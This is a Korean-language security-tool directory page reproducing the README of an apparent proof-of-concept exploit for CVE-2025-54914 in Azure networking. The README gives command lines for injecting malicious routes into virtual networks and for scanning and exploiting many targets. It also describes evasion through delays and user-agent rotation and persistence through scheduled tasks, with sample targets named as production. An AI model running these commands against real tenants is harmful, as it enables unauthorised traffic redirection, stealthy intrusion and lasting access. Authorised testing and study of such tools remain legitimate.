Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/ash1996x/cve-2025-54914-poc
ReconnaissancePersistence MechanismsVulnerability AnalysisExploitationIDS/IPS EvasionPenetration TestingCloud Security
GitHubash1996x/cve-2025-54914-poc

CVE-2025-54914-PoC

CVE-2025-54914를 위한 Azure 네트워킹 익스플로잇 도구로, 라우트 조작, 다중 대상 스캐닝, 회피 기술, 지속성 메커니즘 및 취약성 위험 평가 기능을 제공합니다.

저장소 보기
4411개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
CVE-2025-54914-PoC — CVE-2025-54914를 위한 Azure 네트워킹 익스플로잇 도구로, 라우트 조작, 다중 대상 스캐닝, 회피 기술, 지속성 메커니즘 및 취약성 위험 평가 기능을 제공합니다. | Kitploit

CVE-2025-54914 Azure 경로 익스플로잇

개요

이것은 CVE-2025-54914 Azure Networking 경로 익스플로잇의 개선된 구현입니다. 이 버전은 핵심 CVE 기능을 유지하면서 지속성, 회피, 다중 대상 스캐닝 및 오류 처리와 같은 추가 기능을 제공합니다.

기능

핵심 CVE 기능

  • 경로 생성: Azure 가상 네트워크에 악성 경로를 생성합니다.
  • 경로 삭제: 생성된 경로를 정리하기 위해 제거합니다.
  • API 호환성: Azure Management API 2025-09-01과 함께 작동합니다.
  • 인증: Azure CLI 및 수동 토큰 인증을 지원합니다.

추가 기능

  • 회피 기법: 무작위 지연, 사용자 에이전트 교체, 요청 난독화
  • 지속성: 예약 작업 생성, 연속 모니터링 모드
  • 다중 대상 스캐닝: 여러 대상에 대한 동시 스캐닝 및 익스플로잇
  • 포괄적 보고: 성공/실패 분석을 포함한 상세 보고서
  • 오류 처리: 우아한 오류 처리 및 복구
  • 구성 관리: JSON 기반 대상 구성
  • 대상 검색: 취약한 리소스 자동 검색
  • 위험 평가: 취약점 분석 및 위험 점수

설치

사전 요구 사항

root@kitploit:~
# Install Python dependencies
pip install requests

# Install Azure CLI (for authentication)
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

설치

root@kitploit:~
# Make scripts executable
chmod +x exploit.py
chmod +x exploit_utils.py

# Authenticate with Azure
az login

사용법

기본 사용법

단일 대상 익스플로잇

root@kitploit:~
# Create route on single target
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

# Delete route
python exploit.py \
    --subscription-id "12345678-1234-1234-1234-123456789012" \
    --resource-group "production-rg" \
    --vnet-name "prod-vnet" \
    --subnet-name "prod-subnet" \
    --route-name "exploit-route-1" \
    --operation delete

다중 대상 익스플로잇

root@kitploit:~
# Create configuration file
python exploit_utils.py discover --output targets.json

# Exploit all targets
python exploit.py --targets-file targets.json --operation create

스캔 모드

root@kitploit:~
# Scan targets without exploitation
python exploit.py --targets-file targets.json --scan-only

지속성 모드

root@kitploit:~
# Enable persistence with 30-minute intervals
python exploit.py --targets-file targets.json --persistence-mode --interval 30

고급 사용법

회피 및 은닉

root@kitploit:~
# Custom delay ranges for evasion
python exploit.py \
    --targets-file targets.json \
    --delay-min 1.0 \
    --delay-max 5.0 \
    --max-workers 5

시험 실행 모드

root@kitploit:~
# Test without actual exploitation
python exploit.py --targets-file targets.json --dry-run

상세 로깅

root@kitploit:~
# Enable debug logging
python exploit.py \
    --targets-file targets.json \
    --log-level DEBUG \
    --log-file exploit.log

구성

대상 구성 형식

root@kitploit:~
{
  "targets": [
    {
      "subscription_id": "12345678-1234-1234-1234-123456789012",
      "resource_group": "production-rg",
      "vnet_name": "prod-vnet",
      "subnet_name": "prod-subnet",
      "route_name": "exploit-route-1",
      "address_prefix": "10.0.1.0/24",
      "next_hop_type": "VirtualAppliance",
      "next_hop_ip": "10.0.2.5",
      "api_version": "2025-09-01",
      "priority": 1
    }
  ],
  "metadata": {
    "description": "Target configuration for CVE-2025-54914",
    "created": "2025-01-09",
    "version": "1.0"
  }
}

환경 변수

root@kitploit:~
# Azure access token (alternative to Azure CLI)
export AZURE_ACCESS_TOKEN="your_token_here"

# Log level
export LOG_LEVEL="INFO"

유틸리티 스크립트

대상 검색

root@kitploit:~
# Discover all accessible targets
python exploit_utils.py discover --output discovered_targets.json

# Discover specific subscriptions
python exploit_utils.py discover \
    --subscription-ids "sub1" "sub2" \
    --output targets.json \
    --report discovery_report.txt

구성 생성

root@kitploit:~
# Generate exploit configuration from discovered targets
python exploit_utils.py config \
    --input discovered_targets.json \
    --output exploit_config.json \
    --address-prefix "10.0.1.0/24" \
    --next-hop-ip "10.0.2.5"

취약점 분석

root@kitploit:~
# Analyze targets for risk assessment
python exploit_utils.py analyze \
    --input targets.json \
    --output vulnerability_report.txt

보안 기능

회피 기법

  • 요청 타이밍: 요청 간 무작위 지연
  • 사용자 에이전트 교체: 여러 브라우저 사용자 에이전트
  • 헤더 난독화: 현실적인 HTTP 헤더
  • SSL 검증: 적절한 인증서 확인

지속성 메커니즘

  • 예약 작업: Windows 예약 작업 생성
  • 연속 모드: 장기 실행 지속성
  • 세션 관리: 실행 간 상태 유지
  • 구성 지속성: 디스크에 설정 저장

오류 처리

  • 우아한 저하: 개별 실패 시에도 계속 실행
  • 타임아웃 보호: 요청 지연 방지
  • 시그널 처리: 중단 시 정리 종료
  • 리소스 정리: 종료 시 자동 정리

보고

익스플로잇 보고서

  • 작업 결과: 각 대상의 성공/실패
  • 타이밍 정보: 실행 타임스탬프
  • 오류 세부 정보: 상세 오류 메시지
  • 요약 통계: 전체 성공률

검색 보고서

  • 대상 인벤토리: 발견된 리소스의 전체 목록
  • 구독별 분류: 구독별로 그룹화된 대상
  • 리소스 세부 정보: VNet, 서브넷 및 위치 정보

취약점 분석

  • 위험 평가: 높음/중간/낮음 위험 분류
  • 프로덕션 표시: 프로덕션 환경 식별
  • 태그 분석: 리소스 태그 기반 위험 점수

모범 사례

운영 보안

  1. 시험 실행 사용: 항상 --dry-run으로 먼저 테스트
  2. 범위 제한: 비프로덕션 환경에서 시작
  3. 로그 모니터링: 예상치 못한 동작을 위해 로그 검토
  4. 정리: 테스트 후 생성된 경로 제거

성능 최적화

  1. 작업자 제한: 시스템 용량에 따라 --max-workers 조정
  2. 지연 조정: 지연 설정으로 은닉과 속도 균형
  3. 일괄 처리: 대규모 작업에 대상 파일 사용
  4. 리소스 모니터링: 실행 중 시스템 리소스 모니터링

오류 복구

  1. 로그 확인: 문제 해결을 위해 오류 메시지 검토
  2. 권한 확인: 적절한 Azure 권한 확인
  3. 네트워크 연결: 인터넷 연결 확인
  4. 토큰 유효성: Azure CLI 인증 상태 확인

문제 해결

일반적인 문제

인증 오류

root@kitploit:~
# Re-authenticate with Azure
az login

# Check current account
az account show

# List accessible subscriptions
az account list

권한 오류

root@kitploit:~
# Check required permissions
az role assignment list --assignee $(az account show --query user.name -o tsv)

네트워크 오류

root@kitploit:~
# Test connectivity
curl -I https://management.azure.com

# Check proxy settings
echo $HTTP_PROXY
echo $HTTPS_PROXY

디버그 모드

root@kitploit:~
# Enable detailed logging
python exploit.py --log-level DEBUG --log-file debug.log

# Check log file
tail -f debug.log

법적 및 윤리적 고려 사항

⚠️ 중요: 이 도구는 승인된 보안 테스트 전용입니다.

  • 승인 필요: 소유하거나 명시적 테스트 허가를 받은 시스템에서만 사용
  • 법적 준수: 현지 법률 및 규정 준수 확인
  • 책임 있는 공개: 적절한 채널을 통해 취약점 보고
  • 교육용 사용: 이 도구는 교육 및 연구 목적으로 사용됩니다.

라이선스

이 프로젝트는 연구 및 교육 목적으로만 라이선스가 부여됩니다. 상업적 사용은 명시적 허가가 필요합니다.

기여

  1. 저장소 포크
  2. 기능 브랜치 생성
  3. 변경 사항 적용
  4. 해당되는 경우 테스트 추가
  5. 풀 리퀘스트 제출

지원

문제 및 문의 사항:

  1. 문제 해결 섹션 확인
  2. 오류 세부 정보를 위해 로그 검토
  3. 상세 정보와 함께 이슈 생성
  4. 관련 구성 및 오류 메시지 포함
도구 다운로드